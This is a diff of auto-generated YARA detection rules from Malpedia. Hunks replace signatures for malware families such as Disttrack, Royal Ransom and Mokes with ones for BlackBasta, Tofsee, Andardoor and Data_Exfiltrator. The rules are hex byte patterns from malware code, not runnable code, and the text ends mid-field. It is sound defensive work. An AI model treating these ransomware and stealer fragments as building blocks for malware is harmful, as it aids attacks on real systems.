"https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.disttrack_auto.yar#L1-L264" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackbasta_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ea5b03edf12e9b7619694e3ef0c115e1438e4209a3ddaae7b74afa494e3c57a2" + logic_hash = "7b0b80b4e818e69a7ef8a8ed63d1384307760adc672033eb9b7389cd6b55895b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149958,49 +152796,32 @@ rule MALPEDIA_Win_Disttrack_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 6a00 6a00 6848000700 } - $sequence_1 = { ff15???????? 5d 5b 8bc7 5f 5e } - $sequence_2 = { 68???????? ff15???????? 8d45dc 50 ff15???????? 8b4ddc } - $sequence_3 = { e8???????? 6a07 e8???????? 59 c3 6a10 } - $sequence_4 = { e8???????? 83c404 50 e8???????? 83c404 68???????? ff15???????? } - $sequence_5 = { 488bc8 e8???????? ebd1 498b94dca0940100 } - $sequence_6 = { 41bd08000000 4180fdfe 760d 488d0d392e0100 e8???????? } - $sequence_7 = { 7442 488d157a840000 488bcf e8???????? 85c0 7525 } - $sequence_8 = { 895c2440 895c2444 899c24d8000000 899c24b0000000 899c24b8000000 } - $sequence_9 = { 884c30ff 3bf3 72e6 8b75ec 6a00 } - $sequence_10 = { c3 8b04cd44ec4200 5d c3 0544ffffff } - $sequence_11 = { 57 4883ec20 488d0dc74a0100 e8???????? 48833d????????00 7510 488d0db14a0100 } - $sequence_12 = { 0fb7da 6683fa30 0f862b010000 8b44241c 33c9 66894c4422 66895c4420 } - $sequence_13 = { 885df3 8b4104 80781900 8bf9 7514 38580c } - $sequence_14 = { c7450800000000 e8???????? 68???????? 8d4df4 51 c745f46c924100 } - $sequence_15 = { e8???????? 03f0 56 e8???????? 83c404 c745fc00000000 } - $sequence_16 = { 51 ff15???????? 8b55d4 8955e4 8b45d8 } - $sequence_17 = { 8bc1 eb0c 0fb6c9 0fbe8968004200 } - $sequence_18 = { 8b4004 80781900 74ee 80791900 7505 8bc8 } - $sequence_19 = { 4533c0 498bd4 33c9 c744242800000008 895c2420 ff15???????? 85c0 } - $sequence_20 = { 75f9 2bc2 56 57 8d7801 } - $sequence_21 = { be01000000 4883630800 488d05cf450100 488903 488d4c2428 } - $sequence_22 = { 48634804 488d05b0270100 48894419e8 4883c430 } - $sequence_23 = { 52 50 68???????? ff15???????? 8d34f5b0044200 89442420 33ff } - $sequence_24 = { 7d13 4863ca 8a44191c 42888401602a0200 ffc2 ebe1 } - $sequence_25 = { 8d842498030000 64a300000000 8b4508 33db 89442430 } - $sequence_26 = { 3bc3 0f8476010000 68???????? 68???????? } + $sequence_0 = { ff7590 8bcf e8???????? 84c0 751f 384704 7507 } + $sequence_1 = { 89b574ffffff 894588 89458c e8???????? 84c0 755d 384304 } + $sequence_2 = { 5b 8b4df4 64890d00000000 8d656c 5d c3 8d4d30 } + $sequence_3 = { e8???????? 83c404 85c0 0f849d010000 8d5823 83e3e0 8943fc } + $sequence_4 = { c745e000000000 c745e40f000000 c645d000 c745fc00000000 ff734c e8???????? 83c404 } + $sequence_5 = { b867666666 c645e800 f7ea c1fa05 8bc2 c1e81f 03c2 } + $sequence_6 = { 85f6 7462 8b7d28 3bf7 7416 0f1f440000 8bce } + $sequence_7 = { 56 e8???????? 83463008 83c410 0fb6c3 81c500020000 8b5c2474 } + $sequence_8 = { 8d4dc0 e8???????? 837e1401 741a 837dec01 740d 8d45d8 } + $sequence_9 = { 83c410 8bce 50 68???????? e8???????? 8bf0 c78574ffffff00000000 } condition: - 7 of them and filesize <1112064 + 7 of them and filesize <1758208 } -rule MALPEDIA_Win_Catchamas_Auto : FILE +rule MALPEDIA_Win_Tofsee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f5823958-4dc9-52e1-b587-ac7a6b699e31" + id = "2d8fcb5e-0a8a-503a-9ded-9601f9237fa2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.catchamas_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tofsee_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "49e84bf121f6f46a8c4833df80092f815e20586f9bd57ea545ff931ae803e6c2" + logic_hash = "def89a492b1a308a2f7b3c5c33eb9a3e8527d0ce6d7ff4abe57189bca63d387c" score = 75 quality = 75 tags = "FILE" @@ -150014,71 +152835,69 @@ rule MALPEDIA_Win_Catchamas_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 6808080000 8d54246c 52 } - $sequence_1 = { 5f 5e 8b8c247c200000 33cc e8???????? } - $sequence_2 = { 6a00 ff15???????? e8???????? 8bcb 8b5c244c 51 } - $sequence_3 = { 6683f814 0f84c4080000 833d????????00 0f85af000000 } - $sequence_4 = { 50 bf01000000 ff15???????? 56 ff15???????? 85ff 0f851a010000 } - $sequence_5 = { 50 8d8c2494100000 68???????? 51 ff15???????? 83c42c 33c0 } - $sequence_6 = { 84c0 8b45e0 7409 e8???????? 8bfc eb32 } - $sequence_7 = { ffd7 6a0a 56 8be8 ffd7 8bf8 } - $sequence_8 = { 83e802 0f84bf090000 83e80d 0f845a090000 } - $sequence_9 = { 51 57 8bf0 50 ebbd e8???????? } + $sequence_0 = { 8d8584feffff 50 68b7000000 68a9000000 6a0c 68???????? 68???????? } + $sequence_1 = { f7f3 8b450c 8a0402 88043e 46 3b7508 7ce0 } + $sequence_2 = { f7fb 80c261 881431 49 47 85c9 } + $sequence_3 = { bf???????? 8b46fc 48 744d 48 743a } + $sequence_4 = { 5e 5b c9 c3 56 57 ff15???????? } + $sequence_5 = { 33c0 eb3a 8b4b3c 03cb 813950450000 75ef } + $sequence_6 = { 0f8ee8f7ffff 5b 8b4570 83c004 50 ff15???????? ff7564 } + $sequence_7 = { 8b4038 40 57 8bcb 8945fc e8???????? 8bc8 } + $sequence_8 = { 55 56 57 8bf1 ffd3 8b3d???????? 8be8 } + $sequence_9 = { c0e105 0ad9 32da 34c6 881e 46 3bf7 } condition: - 7 of them and filesize <368640 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Megumin_Auto : FILE +rule MALPEDIA_Win_Unidentified_089_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "992bacc8-d168-5613-b9a1-b270fb7e71d1" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.megumin_auto.yar#L1-L130" + id = "f61e4a77-808b-5e07-801b-03e57ce838b5" + date = "2023-07-11" + modified = "2023-07-15" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_089_auto.yar#L1-L98" license_url = "N/A" - logic_hash = "d3f02e69acad5c637179e097455fd85b104ce227d90fce5cb059c87c08c3436c" + logic_hash = "f9666eb88fbd91e0eb2e4b4c8812230b36d73d66192fed407aecfaa8f0ed362a" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20230705" + malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" + malpedia_version = "20230715" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b348510164600 037520 6b45243c 034528 6bc03c 03452c } - $sequence_1 = { 8945e8 57 8d4dd8 c745fc00000000 e8???????? 8b45e8 85c0 } - $sequence_2 = { 8d45f4 64a300000000 6841010000 8d8528faffff c745fc00000000 6a00 50 } - $sequence_3 = { 8d4dd8 8d45c0 50 e8???????? ff37 8d55d7 8d4db0 } - $sequence_4 = { c60100 e8???????? 8d4c2430 e8???????? 8bc8 83c418 83791410 } - $sequence_5 = { 833d????????00 0f8549870000 8d0d90e74500 ba1d000000 e9???????? 833d????????00 0f852c870000 } - $sequence_6 = { 83c404 8d8d14fdffff c645fc1a 51 8bd0 8d8d04fbffff } - $sequence_7 = { 0f1f440000 8845eb 8b410c 897da8 8945b0 c645fc02 } - $sequence_8 = { 8d4101 8945d8 3dffffff7f 0f8700010000 6a00 6a00 50 } - $sequence_9 = { 3bca 763b 8bd1 a81f 7535 8b48fc } + $sequence_0 = { 889dd4feffff 899d84feffff 898588feffff 889d74feffff 33c0 } + $sequence_1 = { 8b4508 e8???????? c20c00 e8???????? cc 6a30 } + $sequence_2 = { f2e9e3000000 55 8bec eb0d ff7508 e8???????? } + $sequence_3 = { 83f904 0f8582000000 8b75d0 8bfb } + $sequence_4 = { eb0f ff7634 57 ff562c } + $sequence_5 = { 88041e 880c1f 0fb6041e 8b4dfc 03c2 8b550c } + $sequence_6 = { 3dffffff7f 0f87a2000000 03c0 3d00100000 7227 } + $sequence_7 = { 56 6a01 8d4dec 8975d8 } condition: - 7 of them and filesize <1007616 + 7 of them and filesize <389120 } -rule MALPEDIA_Win_Mokes_Auto : FILE +rule MALPEDIA_Win_Andardoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5228f490-0d80-56e9-a8cc-72e35ac44ea7" + id = "a2062653-6e94-5023-8019-c5f17c84046c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mokes_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.andardoor_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "be97fd0567c8d98c1350b6cf1d21361ab6916096a99c6915f04160ab0a34cb53" + logic_hash = "3510472d198d8ac0d724063f8fb842ce0d2281170e5fd2c286cfefa5f50dca2c" score = 75 quality = 75 tags = "FILE" @@ -150092,32 +152911,32 @@ rule MALPEDIA_Win_Mokes_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f6c101 0f85b0000000 8b442424 8b00 3d???????? 0f849f000000 8b4804 } - $sequence_1 = { f20f1001 660f2fc1 0f28c3 f20f5cc7 0f47c1 f20f1008 f20f59c2 } - $sequence_2 = { ff9050010000 8b8bac010000 8d83ac010000 89442424 85c9 740b 83790400 } - $sequence_3 = { ff5030 89442410 83f8ff 7512 8b4508 c700???????? 5f } - $sequence_4 = { f20f1025???????? f30fe6db f30fe6d2 f30fe6c9 f30fe6c0 f20f59dc f20f59d4 } - $sequence_5 = { ffd0 8d4900 3d???????? 0f84cb000000 8b00 85c0 75ef } - $sequence_6 = { e8???????? 8d4e14 e8???????? 8d4e34 e8???????? 5f 5e } - $sequence_7 = { ff750c c70000000000 e8???????? 8b4508 8bce c706???????? c74608???????? } - $sequence_8 = { e8???????? 8b75e4 8b4e0c 03ce 8b4604 8d0445feffffff 50 } - $sequence_9 = { f20f1005???????? 660f2fc1 0f82ac010000 f20f108e88000000 f20f109690000000 f20f5c9680000000 f20f5c4e78 } + $sequence_0 = { 4c8d8c2400020000 33d2 0f1f8000000000 410fb60c11 880c10 488d5201 84c9 } + $sequence_1 = { 6690 488bcb ff15???????? a810 741f 40383d???????? 0f84d0000000 } + $sequence_2 = { 48895c2458 ff15???????? 85c0 752b 488b0d???????? 4885c9 7406 } + $sequence_3 = { 4881ecf0030000 0f2970d8 0f2978c8 488b05???????? } + $sequence_4 = { 0f2970d8 0f2978c8 488b05???????? 4833c4 488985c0020000 } + $sequence_5 = { 41b880000000 e8???????? 4533c9 4c8d442430 } + $sequence_6 = { b943150000 6689742468 ff15???????? 668944246a 41b810000000 } + $sequence_7 = { 488bf8 4885c0 0f84ed000000 b943150000 6689742468 ff15???????? } + $sequence_8 = { 488bf9 33d2 33c9 498bf0 ff15???????? 85c0 7407 } + $sequence_9 = { 488bcf ff15???????? 488bf8 488d4ffe } condition: - 7 of them and filesize <18505728 + 7 of them and filesize <339968 } -rule MALPEDIA_Win_Curator_Auto : FILE +rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fc957193-82db-5d48-97f1-8bf3e9847701" + id = "605ecf11-b36e-51cd-8e37-c406fe5ee743" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.curator_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orpcbackdoor_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "a3bde063a66b4d9394e6eeb42680e73ad8b937005775febd69fd7690156b149c" + logic_hash = "a975ab0f24495978f9e8b667b3f6b02066e8ac424646b3588e19f69238c5dbdd" score = 75 quality = 75 tags = "FILE" @@ -150131,32 +152950,32 @@ rule MALPEDIA_Win_Curator_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 428a8c01e0590600 482bd0 8b42fc d3e8 49895708 41894718 0fb60a } - $sequence_1 = { 4903c1 483bc3 0f84b3000000 4983c004 413bca 72e0 488d6b10 } - $sequence_2 = { 7507 8bc6 e9???????? 44396728 0f8527010000 8d14f5ffffffff 488d4c2458 } - $sequence_3 = { 448b542424 be01000000 389c24b8000000 7449 385c2420 } - $sequence_4 = { 8b4308 25ffffff0f 3dffffff0f 740b 488b03 488bd8 4885c0 } - $sequence_5 = { 660f7ef9 d1c1 894a30 660f6dff 660f7ef9 c1c10a 890a } - $sequence_6 = { f60708 7505 4885c0 7508 48c7432000409901 488b5c2438 4883c420 } - $sequence_7 = { 4183fc01 740b 41bc01000000 e9???????? 488b4dd7 e8???????? 488b4ddf } - $sequence_8 = { 0f843ffeffff 488d55c0 488d4db0 e8???????? e9???????? 488d46ff 488905???????? } - $sequence_9 = { 0f4ed0 e8???????? 488d1517130400 488d4c2420 e8???????? cc } + $sequence_0 = { 8b45fc 83e818 50 e8???????? 59 59 } + $sequence_1 = { 59 ffb5e4f6feff ffb568f5feff 8d8594f9ffff 50 e8???????? 83c40c } + $sequence_2 = { 6a0c 59 be???????? 8dbdc0faffff f3a5 66a5 a4 } + $sequence_3 = { 8b45c4 0fbe00 83f87f 7452 8b45c4 0fbe00 85c0 } + $sequence_4 = { 753e 8b45c8 40 40 3b4524 7734 8b4520 } + $sequence_5 = { 83a5b0fdffff00 8d85b0fdffff 50 6a02 8b85b4fdffff 8b00 ffb5b4fdffff } + $sequence_6 = { 8841fd eb0e a1???????? 0345f4 c640fd00 eb05 } + $sequence_7 = { 6a01 6a40 6a01 6a01 8d8da8fcfeff e8???????? 50 } + $sequence_8 = { 3c5a 7712 0fbec1 83e820 83e07f 8a044589700310 } + $sequence_9 = { 0fbe4001 83f858 7508 8b45c4 40 40 } condition: - 7 of them and filesize <1265664 + 7 of them and filesize <918528 } -rule MALPEDIA_Win_Maudi_Auto : FILE +rule MALPEDIA_Win_Derohe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e4205bc-621f-57ac-9783-0d7a80e63274" + id = "082c8bb6-5e90-542b-87a2-cd5536e22be3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maudi_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.derohe_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "ae4372c99a5ab8731cfa27286c0755a13272fa053f753c6557e155320ea94c91" + logic_hash = "3afbf42b0aba27d1df54ba6496f4a588ae2f7c7ec09fa3d922d168dfad26c783" score = 75 quality = 75 tags = "FILE" @@ -150170,32 +152989,32 @@ rule MALPEDIA_Win_Maudi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5d 8b542408 4a 0f85d9000000 68???????? 87d1 } - $sequence_1 = { 87d1 87ca 51 51 51 } - $sequence_2 = { 56 55 89e5 5d 89e6 fc ad } - $sequence_3 = { 89e5 5d 89e6 fc ad 6804010000 56 } - $sequence_4 = { 59 ffe7 6800400000 6a00 57 68???????? } - $sequence_5 = { cd03 cd02 68???????? 87d1 87ca 51 } - $sequence_6 = { 59 59 ffe7 6800400000 6a00 } - $sequence_7 = { 6804010000 56 50 68???????? 87d1 } - $sequence_8 = { 59 59 ff25???????? 55 } - $sequence_9 = { 5d b986180000 55 89e5 5d be???????? } + $sequence_0 = { ffd0 8b542404 c60424e3 8b02 ffd0 8b542404 c6042405 } + $sequence_1 = { ffd0 8b542404 c604247d 8b02 ffd0 8b542404 c60424df } + $sequence_2 = { ffd0 8b542404 c60424a1 8b02 ffd0 8b542404 c60424e8 } + $sequence_3 = { ffd0 8b442418 8b4c2414 8b542420 898a8c010000 8b0d???????? 85c9 } + $sequence_4 = { ffd0 8b542404 c60424de 8b02 ffd0 8b542404 c60424b8 } + $sequence_5 = { ffd0 8b542404 c60424cc 8b02 ffd0 8b542404 c6042462 } + $sequence_6 = { e8???????? 8b44241c 8b4c2420 8b542424 8b5c2434 894b08 89530c } + $sequence_7 = { ffd0 8b542404 c604247d 8b02 ffd0 8b542404 c60424a4 } + $sequence_8 = { ffd2 8b442404 83c0fa 83f801 0f869e000000 90 8b4c242c } + $sequence_9 = { ffd0 8b542404 c60424e0 8b02 ffd0 8b542404 c6042407 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <35788800 } -rule MALPEDIA_Win_Racket_Auto : FILE +rule MALPEDIA_Win_Reactorbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7cb28a65-c30c-589f-a924-680f6f853124" + id = "db667bb6-5a2a-5433-bb3f-44b94a1b8ccd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.racket_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.reactorbot_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "d1589a59b0768c1bd03360a8449d283c6a3783d8d4ace18ebd09610946148618" + logic_hash = "a8dd74cde779dbd1edde8ec6ea240ea579363dd37eac297b9622688e884b36e8" score = 75 quality = 75 tags = "FILE" @@ -150209,32 +153028,38 @@ rule MALPEDIA_Win_Racket_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd3 8b8eec000000 8bf8 8b1d???????? 8d45ec 57 50 } - $sequence_1 = { 807d0800 743b e8???????? 6a00 ff7604 6845090000 ff35???????? } - $sequence_2 = { 57 0f1f840000000000 8bc1 c745fc02000000 2bc2 8dbb78fdffff 81c680fdffff } - $sequence_3 = { 0f44c1 50 ff75f4 8b473c 68a2090000 ff34856cb30610 ff15???????? } - $sequence_4 = { 40 50 68???????? 6aff 8d85fcfdffff 6800010000 50 } - $sequence_5 = { 0f8433020000 833d????????00 0f8426020000 833d????????00 0f8419020000 833d????????00 0f840c020000 } - $sequence_6 = { 83c430 3945cc 8b45b8 7501 40 8b4dc0 } - $sequence_7 = { 8b4e04 85c9 7537 8b4510 8b7838 85ff 7e75 } - $sequence_8 = { ff740e08 68ac080000 ff35???????? ff15???????? 83c420 2bd8 7418 } - $sequence_9 = { 6a00 68d6070000 897ddc ff34856cb30610 8975d0 ff15???????? 83c410 } + $sequence_0 = { 50 ff15???????? 8d8d90fdffff 51 8d9580f9ffff } + $sequence_1 = { c745f400000000 c745e800000000 c745e400000000 a1???????? 8945e0 } + $sequence_2 = { 7418 6aff a1???????? 50 ff15???????? } + $sequence_3 = { 837dfcff 7411 8b4dfc 51 ff15???????? } + $sequence_4 = { 8b4d08 51 ff15???????? 83c404 8945f0 } + $sequence_5 = { 8b4508 50 6804010000 8d8d78f7ffff 51 e8???????? } + $sequence_6 = { ff15???????? 8945fc 837dfc00 7479 837dfcff } + $sequence_7 = { 7420 8b0d???????? 51 8b15???????? 52 } + $sequence_8 = { 83c005 99 b905000000 f7f9 } + $sequence_9 = { 6bc005 83e803 99 b999000000 } + $sequence_10 = { 69c0b13a0200 99 83e203 03c2 } + $sequence_11 = { e8???????? 833d????????00 7509 833d????????00 740b } + $sequence_12 = { eb0c c705????????b80b0000 eb0a c705????????e8030000 } + $sequence_13 = { 83e101 f7d9 81e12083b8ed 33c1 } + $sequence_14 = { 483d00080000 7323 4863442450 488b4c2468 0fb609 888c04e0030000 } + $sequence_15 = { 83e203 03c2 c1f802 89442410 8b4c240c } condition: - 7 of them and filesize <985088 + 7 of them and filesize <1032192 } -rule MALPEDIA_Win_Royal_Ransom_Auto : FILE +rule MALPEDIA_Win_Unidentified_108_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "03d0866a-b258-5731-ad57-bc4b0e928885" + id = "91d0ee32-15d3-5f4b-b0c7-e219a3fb056f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.royal_ransom_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_108_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "05d0adf9ccc7ed8f53f566dd8191bfd8d7450964340be8e2ce8cbced72447263" + logic_hash = "bc8d7e8276cd214c62a44b786052de8d0d6c82c70c52e7e29cb797627cab2825" score = 75 quality = 75 tags = "FILE" @@ -150248,32 +153073,32 @@ rule MALPEDIA_Win_Royal_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 752f e8???????? 4c8d05d60c1400 ba8b010000 488d0d320c1400 e8???????? 4533c0 } - $sequence_1 = { e9???????? 2bc3 488d0d2df4dfff 488b8ce9d02c2d00 8064f93dfd f7d8 1ac0 } - $sequence_2 = { e8???????? 33c0 e9???????? 488b4820 e8???????? 85c0 0f8497020000 } - $sequence_3 = { e8???????? 488d4e24 448bc8 4c8d0579a80d00 ba09000000 e8???????? 488bcb } - $sequence_4 = { 8bc2 896c2444 418bfe 83fa02 7d3e e8???????? 4c8d05e7a90f00 } - $sequence_5 = { 488d1507b51300 41b893040000 e8???????? 41b894040000 488d15efb41300 488bcf e8???????? } - $sequence_6 = { e8???????? baa6000000 4c89742420 4c8bcd 4c8d05f3a80e00 8d4a93 e8???????? } - $sequence_7 = { 754a e8???????? 4c8d054e820d00 baa2000000 488d0df2810d00 e8???????? 4533c0 } - $sequence_8 = { b828000000 e8???????? 482be0 488d15fc4fffff 488d0d5de62000 e8???????? 33c9 } - $sequence_9 = { e8???????? 85c0 7437 488d05297a0000 4c89742430 4889442428 4c8d0d485c0e00 } + $sequence_0 = { 488d05c7580100 4a8b0ce8 42385cf938 7d4f 400fbece 4084f6 } + $sequence_1 = { 0f8493010000 488d2d3a100100 83635000 83632c00 e9???????? 48ff4318 837b2800 } + $sequence_2 = { 660feb0d???????? 4c8d0d44950000 f20f5cca f2410f590cc1 660f28d1 660f28c1 4c8d0d0b850000 } + $sequence_3 = { 7426 488d5540 803201 488d5201 41ffc0 488d4540 498bcc } + $sequence_4 = { 4c8d05a8310100 83e23f 488d14d2 498b04c0 f644d03801 } + $sequence_5 = { 488d1dd6db0100 458bc5 498bcc 48ffc1 4438040b 75f7 4885c9 } + $sequence_6 = { 458bc5 498bc4 90 48ffc0 44380401 } + $sequence_7 = { 0fb6557f 4889451f 83f201 488d05dbc90000 49c1e302 4889452f 03d2 } + $sequence_8 = { 488d9588000000 803201 488d5201 41ffc0 488d8588000000 } + $sequence_9 = { 7350 488bca 4c8d051d310100 83e13f 488bc2 48c1f806 } condition: - 7 of them and filesize <6235136 + 7 of them and filesize <307200 } -rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE +rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bb4f4861-3b94-5ae9-a941-991186118cf0" + id = "a4e15d5b-f5a8-5629-8aa0-4b08d538c94b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stealer_0x3401_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.data_exfiltrator_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "5581efed5fdecbce8348574e847d7eb07ab8e38c2ac3e166eb58c72b5a5419d5" + logic_hash = "3310f9551fc82e6e58581f9d53ef710d168d316a9e233b611258320515dc0adb" score = 75 quality = 75 tags = "FILE" @@ -150287,34 +153112,34 @@ rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03f2 8bd6 85f6 7e37 8d8d5cfeffff e8???????? } - $sequence_1 = { 53 e8???????? 83c41c c74424280f000000 c744242400000000 c644241400 803b00 } - $sequence_2 = { 5f 894df0 8b34cd50fa0110 8b4d08 6a5a 2bce } - $sequence_3 = { 83781410 7202 8b00 ffb57cfdffff } - $sequence_4 = { c745fc05000000 8d8d5cffffff e8???????? c645fc06 83781410 7202 } - $sequence_5 = { 8b8db87dffff 40 3d00100000 722a f6c11f } - $sequence_6 = { 64a300000000 8b35???????? 8d8574ffffff 50 6a00 } - $sequence_7 = { 8d8598feffff 3bc3 7435 8bc8 e8???????? } - $sequence_8 = { 8d4c2434 e8???????? 53 e8???????? 83c404 8d44242c 8bcf } - $sequence_9 = { ffb5843fffff ffd7 83bd803fffff00 0f84ec000000 6a12 68???????? b9???????? } + $sequence_0 = { 488b4c2440 ff15???????? 4889442420 488b542448 } + $sequence_1 = { e8???????? 4c8b442428 488d152c570000 488b4c2420 e8???????? 41b80a000000 } + $sequence_2 = { 488d8c24a0000000 e8???????? 488d9424a0000000 488b8c2430010000 e8???????? 488905???????? } + $sequence_3 = { c68424ba00000078 c68424bb00000078 c68424bc00000078 c68424bd00000078 c68424be00000000 488d8c24a0000000 } + $sequence_4 = { 48894c2408 4883ec48 48837c246001 752b } + $sequence_5 = { c6442420fb c6442421fc c6442422fe c6442423ff c6442424aa c64424254d } + $sequence_6 = { c68424020100006d c684240301000000 c684240401000007 c68424050100006d c68424060100004f c684240701000072 } + $sequence_7 = { 89442428 837c242800 7c3a 8b442448 39442428 7d30 8b442420 } + $sequence_8 = { 7417 488b442450 488b4c2448 4803c8 488bc1 } + $sequence_9 = { 48837c242800 7509 488d05d8250000 eb22 488d542420 488b4c2428 ff15???????? } condition: - 7 of them and filesize <357376 + 7 of them and filesize <107520 } -rule MALPEDIA_Win_Moker_Auto : FILE +rule MALPEDIA_Win_Sappycache_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "18389526-a462-5233-a3a7-297ee29d064f" + id = "ad4dab53-cb13-5a84-86d5-edc74e26f321" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moker_auto.yar#L1-L160" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sappycache_auto.yar#L1-L118" license_url = "N/A" - logic_hash = 